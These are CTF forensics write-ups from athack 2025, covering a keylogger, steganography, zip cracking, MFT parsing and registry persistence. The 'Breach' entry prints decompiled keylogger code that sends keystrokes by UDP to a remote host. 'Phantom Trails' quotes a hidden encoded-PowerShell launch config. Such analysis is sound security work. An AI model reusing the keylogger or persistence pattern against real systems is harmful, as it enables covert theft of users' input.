athack 2025

Author: octo-kumo

2025-athack-ctf/forensics/Breach/index.md

@@ -0,0 +1,155 @@
+---
+created: 2025-03-01T17:59
+updated: 2025-03-02T01:35
+---
+
+`breach` is a virus that sends keystrokes over UDP it seems.
+
+The linux key event structure is as follows, the virus is sending bytes 16 to 21, which is `type|code|val` where `value` is cut.
+
+```c
+struct input_event {
+	struct timeval time; = {long seconds, long microseconds}
+	unsigned short type;
+	unsigned short code;
+	unsigned int value;
+};
+```
+
+```c
+int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
+{
+  char v3; // [rsp+7h] [rbp-C9h] BYREF
+  int i; // [rsp+8h] [rbp-C8h]
+  int v5; // [rsp+Ch] [rbp-C4h]
+  int fd; // [rsp+10h] [rbp-C0h]
+  int v7; // [rsp+14h] [rbp-BCh]
+  char *src; // [rsp+18h] [rbp-B8h]
+  struct sockaddr addr; // [rsp+20h] [rbp-B0h] BYREF
+  char dest[12]; // [rsp+30h] [rbp-A0h] BYREF
+  int v11; // [rsp+3Ch] [rbp-94h]
+  __int16 v12; // [rsp+40h] [rbp-90h]
+  char v13; // [rsp+42h] [rbp-8Eh]
+  char buf[32]; // [rsp+50h] [rbp-80h] BYREF
+  char v15[88]; // [rsp+70h] [rbp-60h] BYREF
+  unsigned __int64 v16; // [rsp+C8h] [rbp-8h]
+
+  v16 = __readfsqword(0x28u);
+  strcpy(v15, "cat /proc/bus/input/devices | grep keyboard -A 5 | grep -o -E  'event[0-9]+'");
+  src = (char *)execute_command(v15, argv);
+  strcpy(dest, "/dev/input/");
+  v11 = 0;
+  v12 = 0;
+  v13 = 0;
+  strcat(dest, src);
+  v5 = strcspn(dest, "\n");
+  dest[v5] = 0;
+  fd = open(dest, 0);
+  if ( fd < 0 )
+  {
+    perror("Error opening file");
+    exit(1);
+  }
+  free(src);
+  v7 = socket(2, 2, 0);
+  if ( v7 < 0 )
+  {
+    perror("Error creating socket");
+    exit(1);
+  }
+  addr.sa_family = 2;
+  *(_DWORD *)&addr.sa_data[2] = inet_addr("192.168.10.129");
+  *(_WORD *)addr.sa_data = htons(0x539u);
+  while ( read(fd, buf, 0x18uLL) == 24 )
+  {
+    for ( i = 16; i <= 21; ++i )
+    {
+      v3 = buf[i];
+      if ( sendto(v7, &v3, 1uLL, 0, &addr, 0x10u) < 0 )
+      {
+        perror("Error sending data");
+        exit(1);
+      }
+    }
+  }
+  perror("Error reading from file");
+  exit(1);
+}
+```
+
+## solve
+
+Just solve it.
+
+```python
+import struct
+import pyshark
+
+KEY_MAPPING = {
+    2: '1', 3: '2', 4: '3', 5: '4', 6: '5', 7: '6', 8: '7', 9: '8', 10: '9', 11: '0',
+    12: '-', 13: '=', 14: 'BACKSPACE', 15: 'TAB', 16: 'q', 17: 'w', 18: 'e', 19: 'r',
+    20: 't', 21: 'y', 22: 'u', 23: 'i', 24: 'o', 25: 'p', 26: '[', 27: ']', 28: 'ENTER',
+    29: 'CTRL', 30: 'a', 31: 's', 32: 'd', 33: 'f', 34: 'g', 35: 'h', 36: 'j', 37: 'k',
+    38: 'l', 39: ';', 40: "'", 41: '`', 42: 'SHIFT', 43: '\\', 44: 'z', 45: 'x', 46: 'c',
+    47: 'v', 48: 'b', 49: 'n', 50: 'm', 51: ',', 52: '.', 53: '/', 54: 'RSHIFT',
+    55: '*', 56: 'ALT', 57: ' ', 58: 'CAPS', 59: 'F1', 60: 'F2', 61: 'F3',
+    62: 'F4', 63: 'F5', 64: 'F6', 65: 'F7', 66: 'F8', 67: 'F9', 68: 'F10',
+}
+SHIFT_KEY_MAPPING = {
+    '1': '!', '2': '@', '3': '#', '4': '$', '5': '%', '6': '^', '7': '&', '8': '*', '9': '(', '0': ')',
+    '-': '_', '=': '+', '[': '{', ']': '}', '\\': '|', ';': ':', "'": '"', ',': '<', '.': '>', '/': '?',
+    '`': '~'
+}
+
+
+def decode_keystrokes(pcap_file):
+    cap = pyshark.FileCapture(pcap_file, display_filter=f'udp.stream eq 0')
+    all_data = b''
+    for packet in cap:
+        try:
+            if hasattr(packet, 'udp') and hasattr(packet, 'data'):
+                data_hex = packet.data.data
+                all_data += bytes.fromhex(data_hex.replace(':', ''))
+        except AttributeError:
+            continue
+    cap.close()
+    return all_data
+
+
+""" [16:22]
+struct timeval time; = {long seconds, long microseconds} 16
+unsigned short type; 
+unsigned short code;
+unsigned int value;
+"""
+EV_KEY = 1
+EV_MSC = 4
+EV_SYN = 0
+
+keystrokes = decode_keystrokes("capture.pcapng")
+shift = False
+caps = False
+for i in range(0, len(keystrokes), 6):
+	chunk = keystrokes[i:i + 6]
+	t, code, v = struct.unpack('HHH', chunk)
+	# print(f't: {t}, code: {code}, v: {v}')
+	if t == EV_KEY:
+		if code in KEY_MAPPING:
+			key = KEY_MAPPING[code]
+			if v:  # pressed
+				if key == 'SHIFT':
+					shift = True
+				elif key == 'CAPS':
+					caps = not caps
+				else:
+					if shift ^ caps:
+						key = SHIFT_KEY_MAPPING.get(key, key.upper())
+						shift = False
+					print(key, end='')
+		else:
+			print(f'Unknown key: {code}')
+```
+
+```flag
+ATHACKCTF{Y0u_533_h0w_L1NUX_h4NdL3_Input$}
+```

2025-athack-ctf/forensics/Dora.md

@@ -0,0 +1,45 @@
+---
+created: 2025-03-01T16:38
+updated: 2025-03-01T16:50
+---
+
+```
+binwalk -e Jungle.jpeg
+
+DECIMAL       HEXADECIMAL     DESCRIPTION
+--------------------------------------------------------------------------------
+406084        0x63244         Zip archive data, at least v2.0 to extract, name: treasureChest/
+406160        0x63290         Zip archive data, at least v2.0 to extract, uncompressed size: 270158, name: treasureChest/Recording1.wav
+612659        0x95933         Zip archive data, at least v2.0 to extract, uncompressed size: 368, name: __MACOSX/treasureChest/._Recording1.wav
+613027        0x95AA3         Zip archive data, at least v2.0 to extract, uncompressed size: 306552, name: treasureChest/Recording2.wav
+626070        0x98D96         Zip archive data, at least v2.0 to extract, uncompressed size: 611, name: __MACOSX/treasureChest/._Recording2.wav
+
+WARNING: One or more files failed to extract: either no utility was found or it's unimplemented
+```
+
+`Recording2` has beep boops.
+
+![image.png](https://res.cloudinary.com/kumonochisanaka/image/upload/v1740865230/2025/03/e660a92b28ae2a7e58a80cc1ffe97ea2.png)
+
+![image.png](https://res.cloudinary.com/kumonochisanaka/image/upload/v1740865554/2025/03/0895fbceab2a075d0e97298f72223103.png)
+
+![image.png](https://res.cloudinary.com/kumonochisanaka/image/upload/v1740865584/2025/03/66f6c87cf0845d7843d52f05c6b5a4ee.png)
+
+It is a spectrogram.
+
+```
+DWKDFNFWI BRX_IRXQG_WK3_FRRUGLQDW3V
+```
+
+Looks like rotation cipher.
+
+| Method     | Result                                 |
+| ---------- | -------------------------------------- |
+| [A-Z]+3    | `ATHACKCTF{YOU_FOUND_TH3_COORDINAT3S}` |
+| [A-Z0-9]+3 | `ATHACKCTF{8OU_FOUND_TH0_COORDINAT0S}` |
+
+```flag
+ATHACKCTF{YOU_FOUND_TH3_COORDINAT3S}
+```
+
+It is.

2025-athack-ctf/forensics/Lost Password.md

@@ -0,0 +1,26 @@
+---
+created: 2025-03-01T15:33
+updated: 2025-03-01T16:01
+---
+
+It's just a password zip file.
+
+```bash
+$ zip2john flag.zip > hash.txt
+Created directory: /home/kali/.john
+ver 1.0 efh 5455 efh 7875 flag.zip/flag.txt PKZIP Encr: 2b chk, TS_chk, cmplen=58, decmplen=46, crc=584F77B1 ts=8A28 cs=8a28 type=0
+
+$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
+Using default input encoding: UTF-8
+Loaded 1 password hash (PKZIP [32/64])
+Will run 16 OpenMP threads
+Press 'q' or Ctrl-C to abort, almost any other key for status
+welostjester     (flag.zip/flag.txt)
+1g 0:00:00:00 DONE (2025-03-01 15:33) 3.846g/s 10838Kp/s 10838Kc/s 10838KC/s wendreen0601..wardkiel
+Use the "--show" option to display all of the cracked passwords reliably
+Session completed.
+```
+
+```flag
+ATHACKCTF{j000n_c0nGr44tzzz_dis_iz_ur_fl4ggg}
+```

2025-athack-ctf/forensics/MFT.md

@@ -0,0 +1,94 @@
+---
+created: 2025-03-01T16:51
+updated: 2025-03-01T16:56
+---
+
+Open file with MFT Explorer.
+
+![image.png](https://res.cloudinary.com/kumonochisanaka/image/upload/v1740865883/2025/03/321cc1015588c8c01fc21a3e0d37d625.png)
+
+The secret file is at `\Users\relizane\Desktop\important\secret.txt.txt`.
+
+```
+[00000244-0000000D, Entry-seq #: 0x244-0xD, Offset: 0x91000, Flags: InUse, Log Sequence #: 0x2140BCC0, Mft Record To Base Record: Entry/seq: 0x0-0x0
+Reference Count: 0x2, Fixup Data: Expected: 05-00 Fixup Actual: 33-72|00-00 (Fixup OK: True)
+
+**** STANDARD INFO ****
+Type: StandardInformation, Attribute #: 0x0, Size: 0x60, Content size: 0x48, Name size: 0x0, Content offset: 0x18, Resident: True
+
+Flags: Archive, Max Version: 0x0, Flags 2: None, Class Id: 0x0, Owner Id: 0x0, Security Id: 0x73A, Quota Charged: 0x0 
+Update Sequence #: 0xF93F178
+
+Created On:		2025-01-25 06:41:21.8728907
+Content Modified On:	2025-01-25 06:50:57.7326737
+Record Modified On:	2025-01-25 06:50:57.7326737
+Last Accessed On:	2025-01-25 06:50:57.7326737
+
+**** FILE NAME ****
+Type: FileName, Attribute #: 0x5, Size: 0x78, Content size: 0x5A, Name size: 0x0, Content offset: 0x18, Resident: True
+
+File name: SECRET~1.TXT (Length: 0xC)
+Flags: Archive, Name Type: Dos, Reparse Value: 0x0, Physical Size: 0x0, Logical Size: 0x0
+Parent Mft Record: Entry/seq: 0x16685-0x2
+
+Created On:		2025-01-25 06:41:21.8728907
+Content Modified On:	2025-01-25 06:41:21.8728907
+Record Modified On:	2025-01-25 06:41:21.8728907
+Last Accessed On:	2025-01-25 06:41:21.8728907
+
+
+**** FILE NAME ****
+Type: FileName, Attribute #: 0x4, Size: 0x78, Content size: 0x5E, Name size: 0x0, Content offset: 0x18, Resident: True
+
+File name: secret.txt.txt (Length: 0xE)
+Flags: Archive, Name Type: Windows, Reparse Value: 0x0, Physical Size: 0x0, Logical Size: 0x0
+Parent Mft Record: Entry/seq: 0x16685-0x2
+
+Created On:		2025-01-25 06:41:21.8728907
+Content Modified On:	2025-01-25 06:41:21.8728907
+Record Modified On:	2025-01-25 06:41:21.8728907
+Last Accessed On:	2025-01-25 06:41:21.8728907
+
+
+**** OBJECT ID ****
+Type: VolumeVersionObjectId, Attribute #: 0x6, Size: 0x28, Content size: 0x10, Name size: 0x0, Content offset: 0x18, Resident: True
+
+Object Id: 8552a51d-8e03-11ef-87b5-000c29ae9287
+	Object Id MAC: 00:0c:29:ae:92:87:
+	Object Id Created On: 2024-10-19 10:18:44.4606749
+Birth Volume Id: 00000000-0000-0000-0000-000000000000
+Birth Object Id: 00000000-0000-0000-0000-000000000000
+Domain Id: 00000000-0000-0000-0000-000000000000
+
+**** DATA ****
+Type: Data, Attribute #: 0x1, Size: 0x70, Content size: 0x57, Name size: 0x0, Content offset: 0x18, Resident: True
+
+Resident Data
+Data: 2D-2D-3E-20-2D-2D-3E-20-57-65-6C-63-6F-6D-65-20-74-6F-20-41-54-48-41-43-4B-43-54-46-20-32-6B-32-35-3B-20-41-54-48-41-43-4B-43-54-46-7B-4E-54-46-24-5F-4D-34-73-37-33-72-5F-66-69-4C-33-5F-54-34-62-4C-33-21-21-21-7D-0D-0A-2D-2D-3E-20-48-6F-75-73-73-65-6D-30-78-31
+
+ASCII: --> --> Welcome to ATHACKCTF 2k25; ATHACKCTF{NTF$_M4s73r_fiL3_T4bL3!!!}
+--> Houssem0x1
+Unicode: ⴭ‾ⴭ‾敗捬浯⁥潴䄠䡔䍁䍋䙔㈠㉫㬵䄠䡔䍁䍋䙔乻䙔弤㑍㝳爳晟䱩弳㑔䱢ℳ℡ൽⴊ㸭䠠畯獳浥砰�
+
+]
+```
+
+## part 1
+
+> Done by GPT
+
+- **MFT Entry Number:** The header shows “Entry-seq #: 0x244-0xD”. The entry part “0x244” in hexadecimal converts to **580** in decimal.
+- **File Size:** The DATA attribute shows “Content size: 0x57”. In decimal, 0x57 equals **87** bytes.
+- **Creation Time:** The creation timestamp (from both the STANDARD INFO and FILE NAME attributes) is “2025-01-25 06:41:21.8728907”. Dropping the fractional seconds gives **2025-01-25 06:41:21**.
+
+```flag
+ATHACKCTF{580_87_2025-01-25 06:41:21}
+```
+
+## part 2
+
+MFT Explorer supports just reading the contents.
+
+```flag
+ATHACKCTF{NTF$_M4s73r_fiL3_T4bL3!!!}
+```

2025-athack-ctf/forensics/Phantom Trails.md

@@ -0,0 +1,50 @@
+---
+created: 2025-03-01T17:19
+updated: 2025-03-01T17:56
+---
+
+![image.png](https://res.cloudinary.com/kumonochisanaka/image/upload/v1740867597/2025/03/d403118c5aface90d6a1de69ac2d76c0.png)
+
+Files of the zip, sorted by modification date.
+
+## ApplicationConfig.json
+
+```json
+{
+	"IsActive": true,
+	"Name": "execute",
+	"Path": "%Windows%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
+	"Args": "-c \"$p=[System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('IlYxNF9SM2cxJFJ5XzRuRF9MMEwhfSIgLWpvaW4gIiI'));Invoke-Expression $p\"",
+	"OutputExtension": "",
+	"Extensions": "",
+	"HiddenWindow": true,
+	"DeleteInputFile": false
+  }
+```
+
+The very first file is suspicious.
+
+```
+"V14_R3g1$Ry_4nD_L0L!}" -join ""
+```
+
+## where_am_hiding.txt
+
+```
+ZmxhZ3tmNGtlX2ZsNGd9 -> flag{f4ke_fl4g}
+```
+
+## first part.
+
+Couldn't find it, so I cheated.
+
+```bash
+$ grep -r "QVRIQUNLQ1RGe" .
+grep: ./Windows/System32/config/SOFTWARE: binary file matches
+```
+
+![image.png](https://res.cloudinary.com/kumonochisanaka/image/upload/v1740869753/2025/03/6ade6940d987839111df5f8d903061ce.png)
+
+```flag
+ATHACKCTF{P3rS1$TEnC3_gH0$T_V14_R3g1$Ry_4nD_L0L!}
+```